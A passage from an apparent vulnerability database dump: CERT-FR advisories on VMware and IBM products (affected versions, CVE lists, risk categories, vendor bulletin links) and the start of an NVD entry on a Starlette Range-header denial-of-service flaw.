"name": "CVE-2026-25547",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25547"
},
{
"name": "CVE-2025-38640",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38640"
},
{
"name": "CVE-2023-38197",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38197"
},
{
"name": "CVE-2025-38476",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38476"
},
{
"name": "CVE-2025-69420",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69420"
},
{
"name": "CVE-2025-38659",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38659"
},
{
"name": "CVE-2025-64702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64702"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
},
{
"name": "CVE-2025-40140",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40140"
},
{
"name": "CVE-2025-38020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38020"
},
{
"name": "CVE-2025-15224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15224"
},
{
"name": "CVE-2025-40223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40223"
},
{
"name": "CVE-2025-38572",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38572"
},
{
"name": "CVE-2025-23140",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23140"
},
{
"name": "CVE-2025-23150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23150"
},
{
"name": "CVE-2025-38460",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38460"
},
{
"name": "CVE-2025-38182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38182"
},
{
"name": "CVE-2025-38550",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38550"
},
{
"name": "CVE-2024-53114",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53114"
},
{
"name": "CVE-2025-38275",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38275"
},
{
"name": "CVE-2022-48303",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48303"
},
{
"name": "CVE-2025-38345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38345"
},
{
"name": "CVE-2024-37371",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37371"
},
{
"name": "CVE-2023-38545",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38545"
},
{
"name": "CVE-2021-43618",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43618"
},
{
"name": "CVE-2026-0989",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0989"
},
{
"name": "CVE-2025-38170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38170"
},
{
"name": "CVE-2025-39711",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39711"
},
{
"name": "CVE-2025-22115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22115"
},
{
"name": "CVE-2025-22120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22120"
},
{
"name": "CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"name": "CVE-2025-38535",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38535"
},
{
"name": "CVE-2025-38231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38231"
},
{
"name": "CVE-2022-26488",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26488"
},
{
"name": "CVE-2025-37854",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37854"
},
{
"name": "CVE-2025-11494",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11494"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2025-39873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39873"
},
{
"name": "CVE-2018-18384",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-18384"
},
{
"name": "CVE-2025-38473",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38473"
},
{
"name": "CVE-2025-38113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38113"
},
{
"name": "CVE-2020-11023",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11023"
},
{
"name": "CVE-2025-38714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38714"
},
{
"name": "CVE-2023-32665",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32665"
},
{
"name": "CVE-2025-23148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23148"
},
{
"name": "CVE-2025-38361",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38361"
},
{
"name": "CVE-2025-38470",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38470"
},
{
"name": "CVE-2023-23916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23916"
},
{
"name": "CVE-2025-38181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38181"
},
{
"name": "CVE-2025-38391",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38391"
},
{
"name": "CVE-2025-38248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38248"
},
{
"name": "CVE-2025-66418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66418"
},
{
"name": "CVE-2025-40351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40351"
},
{
"name": "CVE-2022-3570",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3570"
},
{
"name": "CVE-2016-9844",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-9844"
},
{
"name": "CVE-2025-40087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40087"
},
{
"name": "CVE-2025-23147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23147"
},
{
"name": "CVE-2024-8088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8088"
},
{
"name": "CVE-2025-48734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48734"
},
{
"name": "CVE-2025-39752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39752"
},
{
"name": "CVE-2026-25646",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25646"
}
],
"initial_release_date": "2026-02-26T00:00:00",
"last_revision_date": "2026-02-26T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0218",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-26T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer un d\u00e9ni de service \u00e0 distance, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et un contournement de la politique de s\u00e9curit\u00e9.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
"vendor_advisories": [
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37096",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37096"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37092",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37092"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37102",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37102"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37078",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37078"
},
{
"published_at": "2026-02-26",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37109",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37109"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37087",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37087"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37090",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37090"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37077",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37077"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37098",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37098"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37079",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37079"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37101",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37101"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37104",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37104"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37080",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37080"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37097",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37097"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37083",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37083"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37086",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37086"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37082",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37082"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37100",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37100"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37099",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37099"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37081",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37081"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37089",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37089"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37076",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37076"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37088",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37088"
},
{
"published_at": "2026-02-26",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36986",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36986"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2025-27",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37103"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37084",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37084"
},
{
"published_at": "2026-02-26",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37110",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37110"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37093",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37093"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37085",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37085"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37095",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37095"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37094",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37094"
}
]
}
CERTFR-2026-AVI-0327
Vulnerability from certfr_avis - Published: 2026-03-20 - Updated: 2026-03-20
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling B2B Integrator | Sterling B2B Integrator et Sterling File Gateway versions 6.1.x antérieures à 6.1.2.8 | ||
| IBM | Sterling | Sterling Control Center versions 6.4.2.x antérieures à 6.4.2.0 iFix01 | ||
| IBM | Sterling B2B Integrator | Sterling B2B Integrator et Sterling File Gateway versions 6.2.2.x antérieures à 6.2.2.0_1 | ||
| IBM | Informix Dynamic Server | Informix Dynamic Server versions 12.10.x antérieures à 12.10.xC16W6 | ||
| IBM | WebSphere | WebSphere Hybrid Edition version 5.1 sans les correctifs de sécurité PH69757 et PH69729 | ||
| IBM | Sterling B2B Integrator | Sterling B2B Integrator et Sterling File Gateway versions 6.2.x antérieures à 6.2.0.5_2 | ||
| IBM | QRadar SIEM | QRadar SIEM versions 7.5.x antérieures à 7.5.0 UP15 | ||
| IBM | QRadar Suite Software | QRadar Suite Software versions 1.10.12.x antérieures à 1.11.9.0 | ||
| IBM | Sterling | Sterling Control Center versions 6.3.1.x antérieures à 6.3.1.0 iFix07 | ||
| IBM | Cloud Pak | Cloud Pak for Security versions 1.10.x antérieures à 1.11.9.0 | ||
| IBM | Sterling | Sterling Control Center versions 6.4.1.x antérieures à 6.4.1.0 iFix01 | ||
| IBM | Sterling B2B Integrator | Sterling B2B Integrator et Sterling File Gateway versions 6.2.1.x antérieures à 6.2.1.1_2 |
References
| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.1.x ant\u00e9rieures \u00e0 6.1.2.8",
"product": {
"name": "Sterling B2B Integrator",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Control Center versions 6.4.2.x ant\u00e9rieures \u00e0 6.4.2.0 iFix01",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.2.x ant\u00e9rieures \u00e0 6.2.2.0_1",
"product": {
"name": "Sterling B2B Integrator",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Informix Dynamic Server versions 12.10.x ant\u00e9rieures \u00e0 12.10.xC16W6",
"product": {
"name": "Informix Dynamic Server",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition version 5.1 sans les correctifs de s\u00e9curit\u00e9 PH69757 et PH69729",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.x ant\u00e9rieures \u00e0 6.2.0.5_2",
"product": {
"name": "Sterling B2B Integrator",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.x ant\u00e9rieures \u00e0 7.5.0 UP15",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions 1.10.12.x ant\u00e9rieures \u00e0 1.11.9.0",
"product": {
"name": "QRadar Suite Software",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Control Center versions 6.3.1.x ant\u00e9rieures \u00e0 6.3.1.0 iFix07",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Security versions 1.10.x ant\u00e9rieures \u00e0 1.11.9.0",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Control Center versions 6.4.1.x ant\u00e9rieures \u00e0 6.4.1.0 iFix01",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.1.x ant\u00e9rieures \u00e0 6.2.1.1_2",
"product": {
"name": "Sterling B2B Integrator",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-32996",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32996"
},
{
"name": "CVE-2025-62727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
},
{
"name": "CVE-2026-21933",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21933"
},
{
"name": "CVE-2026-21932",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21932"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
},
{
"name": "CVE-2025-14242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14242"
},
{
"name": "CVE-2024-47831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47831"
},
{
"name": "CVE-2025-32421",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32421"
},
{
"name": "CVE-2025-12084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12084"
},
{
"name": "CVE-2025-53905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53905"
},
{
"name": "CVE-2025-6176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6176"
},
{
"name": "CVE-2024-51479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
},
{
"name": "CVE-2025-15367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15367"
},
{
"name": "CVE-2025-39933",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39933"
},
{
"name": "CVE-2025-22150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22150"
},
{
"name": "CVE-2022-46337",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-46337"
},
{
"name": "CVE-2025-38022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38022"
},
{
"name": "CVE-2025-5372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5372"
},
{
"name": "CVE-2025-40322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40322"
},
{
"name": "CVE-2025-38459",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38459"
},
{
"name": "CVE-2025-40271",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
},
{
"name": "CVE-2024-11831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11831"
},
{
"name": "CVE-2026-21925",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21925"
},
{
"name": "CVE-2022-50673",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50673"
},
{
"name": "CVE-2025-38024",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38024"
},
{
"name": "CVE-2024-51744",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
},
{
"name": "CVE-2025-6545",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6545"
},
{
"name": "CVE-2025-40269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40269"
},
{
"name": "CVE-2025-55173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55173"
},
{
"name": "CVE-2025-4897",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4897"
},
{
"name": "CVE-2025-48068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48068"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-57752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57752"
},
{
"name": "CVE-2025-32997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32997"
},
{
"name": "CVE-2026-1188",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1188"
},
{
"name": "CVE-2023-53552",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53552"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2025-66471",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66471"
},
{
"name": "CVE-2026-21441",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21441"
},
{
"name": "CVE-2025-57350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57350"
},
{
"name": "CVE-2025-66453",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66453"
},
{
"name": "CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"name": "CVE-2025-15366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15366"
},
{
"name": "CVE-2026-0865",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0865"
},
{
"name": "CVE-2025-40158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40158"
},
{
"name": "CVE-2025-58457",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58457"
},
{
"name": "CVE-2025-48913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48913"
},
{
"name": "CVE-2025-59250",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59250"
},
{
"name": "CVE-2025-14104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14104"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2025-64775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64775"
},
{
"name": "CVE-2025-39760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39760"
},
{
"name": "CVE-2025-40135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40135"
},
{
"name": "CVE-2025-9086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9086"
},
{
"name": "CVE-2020-7660",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-7660"
},
{
"name": "CVE-2024-29371",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29371"
},
{
"name": "CVE-2025-38403",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38403"
},
{
"name": "CVE-2025-14031",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14031"
},
{
"name": "CVE-2025-23184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23184"
},
{
"name": "CVE-2025-38415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38415"
},
{
"name": "CVE-2022-50865",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50865"
},
{
"name": "CVE-2025-29927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29927"
},
{
"name": "CVE-2025-27533",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27533"
},
{
"name": "CVE-2023-44483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44483"
},
{
"name": "CVE-2026-1299",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1299"
},
{
"name": "CVE-2025-40170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40170"
},
{
"name": "CVE-2026-21945",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21945"
},
{
"name": "CVE-2026-1264",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1264"
},
{
"name": "CVE-2025-53906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53906"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2025-8916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
},
{
"name": "CVE-2025-66675",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66675"
},
{
"name": "CVE-2025-68301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68301"
},
{
"name": "CVE-2025-38051",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38051"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2025-40258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40258"
},
{
"name": "CVE-2025-6547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6547"
},
{
"name": "CVE-2025-40096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40096"
},
{
"name": "CVE-2025-57352",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57352"
},
{
"name": "CVE-2024-26766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26766"
},
{
"name": "CVE-2025-66418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66418"
}
],
"initial_release_date": "2026-03-20T00:00:00",
"last_revision_date": "2026-03-20T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0327",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-20T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2026-03-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266518",
"url": "https://www.ibm.com/support/pages/node/7266518"
},
{
"published_at": "2026-03-13",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7263574",
"url": "https://www.ibm.com/support/pages/node/7263574"
},
{
"published_at": "2026-03-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266520",
"url": "https://www.ibm.com/support/pages/node/7266520"
},
{
"published_at": "2026-03-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266678",
"url": "https://www.ibm.com/support/pages/node/7266678"
},
{
"published_at": "2026-03-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266497",
"url": "https://www.ibm.com/support/pages/node/7266497"
},
{
"published_at": "2026-03-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266324",
"url": "https://www.ibm.com/support/pages/node/7266324"
},
{
"published_at": "2026-03-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266711",
"url": "https://www.ibm.com/support/pages/node/7266711"
},
{
"published_at": "2026-03-18",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266677",
"url": "https://www.ibm.com/support/pages/node/7266677"
},
{
"published_at": "2026-03-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266399",
"url": "https://www.ibm.com/support/pages/node/7266399"
},
{
"published_at": "2026-03-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7266321",
"url": "https://www.ibm.com/support/pages/node/7266321"
}
]
}
FKIE_CVE-2025-62727
Vulnerability from fkie_nvd - Published: 2025-10-28 21:15 - Updated: 2026-04-15 00:35
Severity ?
Summary
Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial‑of‑service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.
References
| URL | Tags | ||
